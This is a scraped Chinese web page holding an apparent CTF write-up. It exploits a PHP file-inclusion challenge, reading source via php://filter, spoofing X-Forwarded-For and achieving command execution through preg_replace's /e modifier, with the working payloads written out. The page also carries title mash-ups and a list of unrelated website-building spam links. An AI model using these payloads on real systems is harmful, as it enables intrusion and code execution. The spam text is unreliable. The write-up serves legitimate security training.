当前位置: 首页 > news >正文

购物网站技术方案wordpress 手机顶部悬浮

购物网站技术方案,wordpress 手机顶部悬浮,怎么做阿里巴巴网站,网站策划与建设首先根据题目提示#xff0c;进入云平台设备维护中心页面#xff1a; 页面无异常#xff0c;检查源代码#xff1a; 发现注入点 ?page#xff0c;大致有如下思路#xff1a;1、SSTI模板引擎漏洞#xff1b;2、XXS#xff1b;3、PHP伪协议。 首先尝试SSTI漏洞#xf…首先根据题目提示进入云平台设备维护中心页面 页面无异常检查源代码 发现注入点 ?page大致有如下思路1、SSTI模板引擎漏洞2、XXS3、PHP伪协议。 首先尝试SSTI漏洞构造payload: ?page{{4*5}}提交结果如下 发现页面无回显说明大概率不存在SSTI漏洞。 然后测试XXS漏洞构造payload: ?pagescriptalert(1)/script提交结果如下 页面无响应说明大概率不存在XSS漏洞。 最后测试PHP伪协议 当payload为 ?pageindex 时页面如下 当修改payload为 ?page123 时提交页面如下 再次修改payload为 ?pageindex.php 时 页面显示OK说明可能存在文件包含漏洞 上图引用文章自--上图出处。 首先测试 php://inputphp://input可以进行php代码的提交抓包构造payload 所以php://input不可行。 接着测试 php://filter构造payload来包含index.php来获取它的源码 payload: ?pagephp://filter/resourceindex.php 提交发现index.php被重复执行了 说明源码中使用的文件包含函数是 include、require这类函数这类函数直接包含文件会导致其中的代码直接被执行若要包含文件而不希望其中的代码被执行则可以考虑file_get_content()函数。 所以我们需要使用过滤器来读取源码 构造payload ?pagephp://filter/readconvert.base64-encode/resourceindex.php提交页面如下 得到经过 base64 加密后的源码在解码工具中进行解码得到index.php源码如下 ?php$page $_GET[page];if (isset($page)) {if (ctype_alnum($page)) { ?br /br /br /br /div styletext-align:centerp classlead?php echo $page; die();?/pbr /br /br /br /?php}else{?br /br /br /br /div styletext-align:centerp classlead?phpif (strpos($page, input) 0) {die();}if (strpos($page, ta:text) 0) {die();}if (strpos($page, text) 0) {die();}if ($page index.php) {die(Ok); //输入值为index.php时回显OK的原因}include($page); //使用include()方法包含文件die();?/pbr /br /br /br /?php }}//方便的实现输入输出的功能,正在开发中的功能只能内部人员测试//以下才为关键代码if ($_SERVER[HTTP_X_FORWARDED_FOR] 127.0.0.1) {echo br Welcome My Admin ! br ;$pattern $_GET[pat];$replacement $_GET[rep];$subject $_GET[sub];if (isset($pattern) isset($replacement) isset($subject)) {preg_replace($pattern, $replacement, $subject);}else{die();}}? 解题关键在最后一个if判断中若想判断返回True则需要抓包修改 X-Forwarded-For: X-Forwarded-For 是一个 HTTP 请求头部字段用于指示客户端真实的 IP 地址尤其是当请求经过了一个或多个代理服务器或负载均衡器时。这个字段的主要作用是提供了客户端的原始 IP 地址即使请求经过了中间的代理服务器也能够追踪到真实的客户端地址。 在http请求中添加X-Forwarded-For参数发现成功回显。接下来的解题关键为 preg_replace()函数。 preg_replace(参数一参数二参数三)函数 参数一要搜索的正则表达式 参数二用于替换匹配部分的字符串 参数三要被进行替换的原始字符串 构造payload ?pat/abc/erepsystem(ls)subabc。 正则表达式中的 /e 修饰符在 PHP 中已经被废弃它表示在执行替换时将替换字符串作为 PHP 代码进行评估和执行。在较早的 PHP 版本中preg_replace() 函数支持 /e 修饰符但由于其存在严重的安全隐患自 PHP 5.5.0 版本开始被弃用并在 PHP 7.0.0 版本中完全移除。 利用正则表达式将 abc 替换为 system(ls)再使用正则表达式 /e 来执行命令 发现命令可以被成功执行并发现可疑文件s3chahahaDir构造新的payload将当前目录切换至s3chahahaDir中并查找flag。 构造payload ?pat/abc/erepsystem(cd%20s3chahahaDir%26%26ls)subabc %20空格 %26 %26%26 提交页面如下 发现目录下存在文件flag猜测flag值很有可能就在文件flag中jia于是构造新的payload去访问flag payload: ?pat/abc/erepsystem(cd%20s3chahahaDir/flag%26%26ls)subabc提交页面如下 发现flag.php构造payload访问flag.php: payload: ?pat/abc/erepsystem(cat%20s3chahahaDir/flag/flag.php)subabc 成功拿到flag。
http://www.zqtcl.cn/news/634885/

相关文章:

  • 合肥做网站可以吗网站程序 seo
  • 网站备案 动态ip网站多域名
  • 网站加速免费电子商务网站建设的认识
  • 做职业资格考试的网站有哪些网页游戏排行榜2024前十名
  • 网站设计方案怎么写wordpress仿站软件
  • 汕头建站模板系统北京有哪些电商平台公司
  • 深圳网站建设zhaoseo小包工头接活的平台
  • 电商平面设计前景如何seo推广什么意思
  • 网站解析不了wordpress 密码失败
  • 临沂企业建站系统模板扮家家室内设计
  • 做简单网站用什么软件网站开发国外研究现状
  • 江苏seo推广网站建设湖南软件定制开发
  • 台州商务网站手机端seo
  • 网站的切换语言都是怎么做的有哪些开发网站公司
  • 上海人才中心网站湖州建设公司网站
  • 网站的前台后台网站建设公司新报
  • 菜鸟式网站建设图书深圳建站公司好坏
  • 品牌网站建设熊掌号一级消防工程师考试通过率多少
  • 网站建设淘宝客模板湖口网站建设
  • 拱墅区建设局网站做设计的搜素材上什么网站
  • 济南烨铭网站建设外贸建网站免费模板
  • 那些网站可以做反链浏览器网站大全
  • 泉州网站建设推广企业网页兼容性站点
  • 怎样做视频上网站赚钱推广计划怎么做推广是什么
  • 台州外贸网站建设做网站开发一般用什么语言
  • 咸阳做网站的公司漯河网做网站
  • 红酒网站模板下载做网站加推广
  • 免费网站服务器域名在线手机网站建设
  • 北京网站ui设计公司在线设计装修
  • 大学生网站作业北京网站优化技术